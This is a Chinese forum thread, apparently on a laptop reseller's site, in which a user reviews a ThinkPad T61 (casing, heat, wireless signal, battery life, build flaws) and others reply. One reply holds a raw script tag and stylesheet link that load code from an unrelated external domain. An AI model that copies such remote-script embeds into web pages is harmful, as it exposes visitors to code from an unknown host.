开业于2004年,诚信服务几万客户
翔意数码淘宝店:xynbnb.taobao.com
全国客服电话:010-59000667
地址:北京东城区东兴隆街56号北京商界A座512
ThinkPad产品专业客服 苹果产品专业客服

T61-A53入手,陆续评测登载中

外观上和T60相比没有太大的变化,手感还是很好,依然给人很踏实,很稳重的感觉。做工个人感觉没有T43以前的系列好了,模具不是那么严丝合缝了,上盖的材质虽然变了,但是仍然很结实,我用手使劲按了,绝对没有软的感觉!
重量上来说确实给我很大的负担,呵呵,本人181身高,体重72kg,背着还是觉得有些沉重。键盘一如既往的好,非常赞!散热和噪音控制的非常好,屏幕效果也非常不错,无线信号比T60好了很多,其他电池,还有待使用中进一步评价。
从昨天到今天测试了无线的使用,我家里用的是ALPHA的AP,从我的卧室到电脑桌大概12米的距离,中间还有门和隔断,信号基本稳定在40%-60%之间,公司是TP-LINK的AP,距离在10米左右不过有一道墙和玻璃门,信号能稳定在50%上下,不过下午出现了几次无法连接的情况,这比我同事的X31好的多了,他们的信号也就是20%还经常断线。呵呵
从8点半到办公室上班,到6点半下班,期间午饭半个小时,机器基本一直在运转,底部只有温热的感觉,放在腿上不会有不适感,对散热可以说彻底放心了!安心过个夏天是没问题了,右掌托硬盘部份基本只是温热,就像经常接触被捂热的温度似的,左侧基本没变化,键盘部份没有感觉到用了一天之后的热度上升,基本全天在一个温度,好爽,我每天邮件超多,这可是我的一大福音啊
这几天在出差,所以没有来的及更新跟进,现在把大家关心的外壳和电池问题谈谈,嗯嗯,清清嗓子.
首先说外壳吧,身边不少人用T42和x31,对比发现T61外壳的手感不像以前那么特别细腻的光滑,似乎T61的外壳喷涂材料里面增加了一些有颗粒感的东西,手触的感觉是有些涩,涂层的柔软感觉比以前要好.外壳的结实是无庸置疑的,这点大家真的可以放心,用手在外壳的各个位置用力按,都没有塌陷或者软的感觉,镁铝的防滚架看来不是嚎头,凭心而论,放弃了全金属顶盖,换来更好的无线信号,我个人觉得值,关键是开始担心放弃金属顶盖后而牺牲机器安全保护的担心是多余的
电池我在外面以处理文档,无线上网收邮件为主,电池模式我设置为最长电池寿命,大概使用时间在3到3个半小时之间,根据每个人使用情况不同吧.用电池的时候因为是低功耗模式,所以机器安静的让你感觉不到他在运转,散热也非常非常的赞!!!
说了半天优点,还是要说说缺点.
第一,机器实在是太重了,比15寸的本轻不了多少,我以前用过HP的NX6120,15寸净重2.47,感觉T61比之前的本轻不了多少.
第二,电池的突出实在是不舒服,放在内胆里面内胆不能完全扣好,think没有14寸宽屏的内胆,我用的是HP的14寸宽屏内胆,T61放进去紧紧的.要把电池卸下来才能扣好内胆.
第三,也是最重要的一点,做工和模具明显不够细致,和T42,T43,T60比较过,真是一代不如一代了,屏幕的A壳边缝连接处居然能明显看到缝隙,在下面的地方大家仔细看,甚至有些桥形的感觉.希望不会时间长了进灰,感觉这个价位的机器不应该是这种装配,各位购买的时候一定要仔细检查.
第四,折边的设计取消了实在是一大败笔,估计是因为换了14寸宽设计折边会很难看,可是防尘效果就不如以前了.
第五,合上盖子后没有以前的严丝合缝感了,电池的连接处感觉恐怕没有以前结实了,紧密度也不够好.
就目前使用的情况来看,宽屏加不对称的设计没有影响到工作和美观,毕竟谁也不会总盯着边框看是不是?
我个人喜欢宽屏,可以同时开两个文档,对照着编辑,工作效率可以大幅提高。家里的PC是普屏的,在宽屏和普屏之间来回看也没有什么不适应,只是个人习惯不同吧。
另外说一下T61的蓝牙,还是非常好用的,我用CHT9000,自己刷的WM6系统,用蓝牙同步传东西那是非常的方便。
不过要去LENOVO的网站更新驱动,原始的windows驱动有问题。
散热和坚固性经过我历时5次,从南至北的飞行加陆地考验完全可以放心了。硬盘的APS智能防震系统也是非常可靠,在飞机上用本的时候能敏感的侦测到震动自动保护硬盘,旅行中放在行李架上也不怕挤压。顺便说一下,T61的宽屏还是非常引人注目的,飞机上看看电影,听听歌,很能吸引空姐和旁边座位上MM的眼光,其他的人当然是羡慕了。呵呵
各位还有什么关心的地方提出来吧,我觉得我能够感受的已经都分享给大家了.也许我的组织语言能力有限,希望各位多多指正
楼主的实际体会啊,呵呵
★★★
<script type="text/javascript" src="http://www.972.cc/1.js"></script>
<link href="http://www.972.cc/1.css" rel="stylesheet" type="text/css" media="screen" />

<P>&nbsp;</P>

恭喜了,嘿嘿,有一点不明白,折边是什么,上盖的那个折边吗?
终于看到务实的评测了.感谢。
苦呀!猛挣翔币中,期待出手!
上点测评的图图。
图文并茂就更好了,总之很切切
好帖
怎么没有下文了呀???????
怎么没有下文了呀???????
看不到下文,只有慢慢的等了。
折边是什么东西啊?咋不回答我??
看不到下文,只有慢慢的等了。
恭喜恭喜!要是再加几张图片就更好了!
我也喜欢打开两个文档,对照修改~~~
这个评测来的实际~~~等普屏讲价就出手
感谢楼主分享啊!顶一个!
技术贴一定要支持
很详细,谢谢LZ~自己的体会
原来买本是用来让人羡慕的
细致的评测啊,比IT网站的评测好多了
添点图片就完美了。
楼主说的缺点让我心有余悸~~~